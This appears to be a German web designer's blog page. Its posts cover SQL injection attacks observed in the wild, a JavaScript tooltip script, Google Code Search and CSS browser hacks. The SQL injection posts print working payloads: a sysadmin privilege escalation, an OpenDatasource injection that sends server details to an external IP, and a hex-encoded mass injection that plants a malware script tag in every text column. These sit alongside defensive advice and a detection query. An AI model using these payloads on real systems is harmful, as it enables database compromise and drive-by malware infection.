This website mostly serves to present my work as an webdesigner. In my portfolio you will find an overview of my recent projects.

Anleitung zum löschen des Cache: cachemeifyoucan.com

markuslang.com

bigr-solutions.net

musikwerker.de

projekt-misside-guinea.de

feedyourfeeds.com

 

 

SQL-Injection, ‘ OR 1=1 ist für Anfänger!

Neben dem im letzten Post erwähnten SQL-Befehl, der dafür zuständig ist den Inhalt aller Textfelder in einer Datenbank um bestimmten JavaScript-Code zu erweitern, konnte ich weitere interessante Vorgehensweisen beobachten:

  1. ';declare @moo varchar(50); set @moo = (select SYSTEM_USER);exec master.dbo.sp_addsrvrolemember @moo, 'sysadmin'--

Damit wird versucht den aktuellen Nutzer der Rolle "sysadmin" hinzuzufügen, damit soll wahrscheinlich die Grundlage für weitere Befehle geschaffen werden.

Die nachfolgende SQL-Injection ist aber mit Abstand die interessanteste. Hier wird eine Verbindung zu einem kompromitieren SQL-Server aufgebaut, dieser Server ist noch online und hostet den Online-Shop (6cang.com). Das Passwort habe ich hier verschleiert. Die Tabelle _t_basicinfo gehört auch nicht zum Standardrepertoire der master Tabelle vom MSSQL-Server. Das könnte man als sogenanntes Silent-SQL-Injection prägen, immerhin merkt der angegriffene erstmal nichts von der Attacke. Die Angreifer sammeln automatisiert (sqlmap) potenzielle Opfer und widmen sich diesen dann ausgiebiger. Sehr clever. Blöd natürlich das das Passwort in der Attacke auftaucht, verbreitet sich dieser Befehl im Internet, könnte der Admin leicht ins schwitzen geraten. Meine Kontaktversuche mit 6cang.com waren nicht erfolgreich.

  1. ;dEcLaRe @s vArChAr(8000) sEt @s=0x20496....d2d eXeC(@s) --

  1. INSERT INTO OpenDatasource('sqloledb','Data Source=222.35.142.45,1433;Network Library=DBMSSOCN;Initial Catalog=master;
  2. User ID=sa;Password=XXXXXXXXX;').master.dbo._t_basicinfo
  3.  SELECT dB_nAME(),uSER,@@vERSION,@@sERVERnAME,@@sERVICEnAME,sYSTEM_uSER,gETDATE()--
  4.  

Posted in programmers-corner |CommentsNo Comments »

SQL-Injection, der Spass beginnt!

Kann der Web-Entwickler abends ruhig einschlafen, oder gehen ihm diese oder ähnliche Zeilen durch den Kopf?

 

  • sql = "SELECT * FROM ShopWarenkorb WHERE id = '"& Request.QueryString("id") &"'"

 

Derzeit werden sehr viele Webseiten auf Sicherheitslücken durch SQL-Injection abgegrasst. Wer davon noch nichts gehört hat sollte Heise Security endlich in seinen RSS-Reader aufnehmen. Hier ein paar Artikel die das Problem verdeutlichen:

 

 

Aber wie funktioniert das? Wie kommt schädliches Javascript in die Datenbank? Ganz einfach, mittels SQL-Injection wird der SQL-Befehl der Anwendung abgeschlossen und der Angreifer fügt seinen eigenen SQL-Code hinzu. Das kann dann so aussehen:

 

  • http://www.xyz.com/?id=1';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=
    CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0077006F00770067006D0031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200
    %20AS%20NVARCHAR(4000));EXEC(@S);--

 

In dem ersten Wert des CAST befindet sich der SQL-Befehl als Hexwert. Mittels SQL läßt sich ein String leicht in Binärwerte konvertieren, es gibt ja den Datentyp BINARY ;)

 

  • DECLARE @nvarchar NVARCHAR(4000)
  • SET @nvarchar = 'SELECT'
  •  
  • DECLARE @BINARY BINARY(12)
  • SET @BINARY = CAST(@nvarchar AS BINARY)
  •  
  • SELECT @BINARY
  • SELECT CAST(@BINARY AS NVARCHAR(4000))

 

Konvertiert man den SQL-Code von oben wieder in NVARCHAR erhält man folgendes SQL:

 

  • DECLARE @T varchar(255), @C varchar(255)  
  • DECLARE Table_Cursor
  •  
  • CURSOR FOR
  • SELECT a.name,b.name
  • FROM sysobjects a,syscolumns b
  • WHERE
  • a.id=b.id
  • AND a.xtype='u'
  • AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
  •  
  • OPEN Table_Cursor
  • FETCH NEXT FROM  Table_Cursor
  • INTO @T,@C
  • WHILE(@@FETCH_STATUS=0)
  • BEGIN
  • exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://xyz/xyz.js></script>''')
  • FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

Dieses SQL macht nichts weiter als alle Tabellen (Nutzertabellen) der Datenbank ermitteln und in die Textspalten jeweils am Ende von Rechts den angegebenen String einfügen. Die Web-Anwendung nimmt die Inhalte aus der Datenbank und gibt diese auf einer Seite aus. Somit wird, Voraussetzung ist natürlich der angegebene Server ist noch online, das eingebundene Javascript ausgeführt. Der Code in dem eingebundenen Javascript versucht dann vermutlich per Buffer Overflow in verschiedenen Plugins der Browser eigenen Code auszuführen um damit gefährliche Programme nachzuladen / zu installieren (Trojaner etc.).

 

Was man dagegen tun kann ist eigentlich ganz einfach. Alle Eingabewerte der Nutzer richtig prüfen und sämtliche SQL-Befehle parametrisiert an die Datenbank geben. Bitte nicht in einer Stored Procedure wiederum mit dem Parameter einen SQL-Befehl zusammenbauen und anschließend per EXEC ausführen ;)

 

Mithilfe dieser SQL-Befehle läßt sich die Datenbank nach womöglich schädlichen Code durchsuchen:

 

  • DECLARE @searchValue varchar(255)
  • SET @searchValue = 'script'
  •  
  • SET NOCOUNT ON
  •  
  • DECLARE @TempTable TABLE (table_name varchar(255),column_name varchar(255))
  • CREATE TABLE #TempTableContent (table_name varchar(255),column_name varchar(255), value text)
  •  
  • INSERT INTO @TempTable
  • SELECT ic.table_schema + '.' + dbo.sysobjects.name AS Tabellenname, dbo.syscolumns.name AS Spaltenname
  • FROM dbo.syscolumns
  • INNER JOIN dbo.sysobjects ON dbo.syscolumns.id = dbo.sysobjects.id
  • INNER JOIN dbo.systypes ON dbo.syscolumns.xtype = dbo.systypes.xtype
  • INNER JOIN information_schema.COLUMNS ic ON ic.table_name = dbo.sysobjects.name AND ic.column_name = dbo.syscolumns.name
  • WHERE (dbo.sysobjects.xtype = 'U') AND dbo.systypes.name IN ('varchar', 'nvarchar', 'text', 'char', 'ntext')
  •  
  • DECLARE @SQLString varchar(500);
  • DECLARE @table_name varchar(255), @column_name varchar(255)
  •  
  • DECLARE DATA CURSOR LOCAL FAST_FORWARD FOR
  • SELECT table_name, column_name FROM @TempTable
  •  
  • OPEN DATA
  •  
  • FETCH NEXT FROM DATA
  • INTO @table_name, @column_name
  •  
  • WHILE @@FETCH_STATUS = 0
  • BEGIN
  •         SET @SQLString = N'select '''+ @table_name +''' AS table_name, ''' + @column_name +''' AS column_name, [' + @column_name +'] AS value ' + ' FROM ' + @table_name + ' where [' + @column_name + '] LIKE ''%'+@searchValue+'%''';
  •  
  •         INSERT INTO #TempTableContent
  •         EXEC(@SQLString)
  •  
  •         FETCH NEXT FROM DATA
  •         INTO @table_name, @column_name
  •  
  • END
  • SELECT * FROM #TempTableContent
  • DROP TABLE #TempTableContent

Posted in programmers-corner |Comments1 Comment »

Tooltip with JavaScript

Mit dem folgenden kleinen Skript lassen sich unterschiedliche Tooltips mittels JavaScript realisieren.

Die JavaScript-Funktionen zur Erzeugung der Tooltips werden über eine ausgelagerte JavaScript-Datei eingebunden.

  1. // tt = tooltip
  2. // global variables
  3. var intOffset_X_Pointer = 20;
  4. var intOffset_Y_Pointer = 20;
  5.  
  6. // elements for tooltip
  7. var aryToolTipElements = Array('a','span');
  8.  
  9. // browser?
  10. var blnIE = document.all;
  11. var blnNS = document.getElementById && !document.all;
  12.  
  13. // tt-container
  14. document.write('<div id="my_tt"></div><br />');
  15.  
  16. var show_tt = false;
  17. var obj_tt = document.getElementById("my_tt");
  18.  
  19. // get tt-elements
  20. function generateToolTips() {
  21.   for (var x = 0; x != aryToolTipElements.length; x++) {
  22.     var objElement = document.getElementsByTagName(aryToolTipElements[x]);
  23.     if (objElement) {
  24.       for (var y = 0; y != objElement.length; y++) {
  25.         if (objElement[y].className == "tt") {
  26.           objElement[y].setAttribute("tt_content", objElement[y].title);
  27.           objElement[y].removeAttribute("title");
  28.           objElement[y].onmouseover = function() {
  29.             enable_tt(this.getAttribute("tt_content"),true);
  30.           };
  31.           objElement[y].onmouseout = function() { hide_tt(false); };
  32.         }
  33.       }
  34.     }
  35.   }
  36. }
  37.  
  38. function enable_tt(tt_content, blnShow_tt) {
  39.   show_tt = blnShow_tt;
  40.   obj_tt.innerHTML = tt_content;
  41. }
  42.  
  43. function hide_tt(blnShow_tt) {
  44.   show_tt = blnShow_tt;
  45.   obj_tt.style.width = '';
  46.   obj_tt.style.left = "-5000px";
  47.   obj_tt.style.visibility = "hidden";
  48. }
  49.  
  50. function tt_position(objThis) {
  51.   if (show_tt) {
  52.     // get ViewPortheight
  53.     var intcH = document.documentElement.clientHeight;
  54.     // differentiated values for IE and NS
  55.     if (blnIE) {
  56.       intcX = event.clientX; intcY = event.clientY + document.documentElement.scrollTop;
  57.       intsLeft = document.documentElement.scrollLeft;
  58.       var intBottom = intcH - event.clientY - 20;
  59.     } else {
  60.       intcX = objThis.clientX; intcY = objThis.pageY;
  61.       var intBottom = intcH - objThis.clientY - 20;
  62.       intsLeft = 0;
  63.     }
  64.     // set tt-pos
  65.     obj_tt.style.left = intcX - intOffset_X_Pointer + "px";
  66.     if (intBottom < obj_tt.offsetHeight) {
  67.       obj_tt.style.top = intcY - obj_tt.offsetHeight - 10 + "px";
  68.     } else {
  69.       obj_tt.style.top = intcY + intOffset_Y_Pointer + "px";
  70.     }
  71.     obj_tt.style.visibility = "visible";
  72.   }
  73. }


Im Kopfbereich der HTML-Seite sind nur wenige Änderungen notwendig. Das ausgelagerte JavaScript (tooltip.js) sowie zwei Anweisungen zur initialisieren müssen eingebunden werden.

  1. <script type="text/javascript" src="tooltip.js"></script>


  1. window.onload = function() {
  2.   generateToolTips();
  3.   document.onmousemove = tt_position;
  4. }


Nun können unterschiedliche Element mit einen Tooltip versehen werden. Dafür muss dem Element die CSS-Klasse "tt" zugeordnet, sowie der Inhalt des Tooltips in das Attribut "title" geschrieben werden.

  1. <a href="http://www.knoxmic.net" class="tt"
  2.   title="<p>get this tooltip script now</p>">tooltip #1</a>


Das vorgestellte Beispiel kann wieder im Browser betrachtet oder heruntergeladen werden.

Posted in programmers-corner |Comments2 Comments »

Fun with Google Code Search

Vor wenigen Tagen hat Google ein neues Tool freigegeben. Was man in Quelltext so alles entdecken kann: http://www.google.com/codesearch?q=d'oh

Ebenso: http://www.google.com/codesearch?q=easteregg


Posted in software |CommentsNo Comments »

CSS hacks 2 go

Damit eine Website in unterschiedlichen Browsern richtig dargestellt werden kann, bedarf es nicht selten ein paar Tricks. Die folgenden selbst eingesetzten CSS-Snippets sollen eine eigene kleine Sammlung dieser Tricks darstellen:


So läßt sich zum Beispiel ein Bug bei der Implementierung einer CSS-Anweisung (voice-family) im Business Browser IE 4/5 zum verbergen von CSS-Anweisungen ausnutzen.


  1. span {
  2.   font-size:x-small;
  3.   voice-family:"\"}\"";
  4.   voice-family:inherit;
  5.   font-size:small;
  6. }

Um den IE 4/5/6 ganz vor der Tür stehen zu lassen, genügt der Gebrauch eines Kindselektors:


  1. html>body p { margin:0; }

Alle in dem Container, erste und letzte Zeile im Codebeispiel, enthaltenen Anweisungen sind für den Netscape 4 unsichtbar.


  1. /*/*/a{}
  2. body {
  3.   margin:0;
  4. }
  5. /* */

Seit nicht allzu langer Zeit, tendiere ich allerdings dazu, CSS-Anweisungen die ich für den IE korrigieren muss, über Conditional Comments darzustellen. Genau das würde ich auch allen Besuchern empfehlen, mit der weiteren Verbreitung des IE 7 sollten auch einige css hacks der Vergangenheit angehören.


  1. <!--[if IE]>
  2.   <style type="text/css" media="screen">
  3.     p {
  4.       padding:0;
  5.       margin:0;
  6.     }
  7.   </style>     
  8. <! [endif]-->

Posted in programmers-corner, webdesign |CommentsNo Comments »